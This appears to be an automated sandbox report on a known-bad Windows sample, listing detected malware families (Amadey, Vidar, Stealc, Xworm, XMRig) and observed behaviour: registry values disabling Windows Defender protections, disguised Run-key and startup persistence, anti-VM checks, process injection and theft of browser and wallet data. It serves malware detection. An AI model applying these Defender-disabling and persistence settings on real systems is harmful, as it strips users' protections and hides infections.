Analysis Overview
SHA256
19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288
Threat Level: Known bad
The file 19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288 was found to be: Known bad.
Malicious Activity Summary
Stealc
Detect Xworm Payload
Healer
Stealc family
xmrig
Vidar family
LiteHTTP
GCleaner
Xworm
Modifies Windows Defender DisableAntiSpyware settings
SystemBC
Vidar
Litehttp family
Xmrig family
Detects Healer an antivirus disabler dropper
Gcleaner family
Healer family
Amadey
Xworm family
Systembc family
Detect Vidar Stealer
Amadey family
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender TamperProtection settings
Modifies Windows Defender notification settings
XMRig Miner payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Identifies Wine through registry keys
Checks BIOS information in registry
Windows security modification
Reads user/profile data of web browsers
Checks computer location settings
Executes dropped EXE
Reads user/profile data of local email clients
Loads dropped DLL
Drops startup file
.NET Reactor proctector
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks installed software on the system
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Windows directory
Browser Information Discovery
Program crash
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Checks processor information in registry
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Modifies system certificate store
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 23:34
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 23:34
Reported
2025-03-05 23:37
Platform
win7-20240903-en
Max time kernel
150s
Max time network
156s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Stealc
Stealc family
Vidar
Vidar family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\jLEaFdlg\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a2a6d35a13.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\a2a6d35a13.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\a3f26c3fce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\a3f26c3fce.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\b668242231.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\b668242231.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\e16f9098dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107940101\\e16f9098dd.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 984 set thread context of 1548 | N/A | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe |
| PID 3044 set thread context of 1412 | N/A | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2552 set thread context of 1828 | N/A | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3448 set thread context of 3548 | N/A | C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe |
| PID 3672 set thread context of 3728 | N/A | C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | N/A |
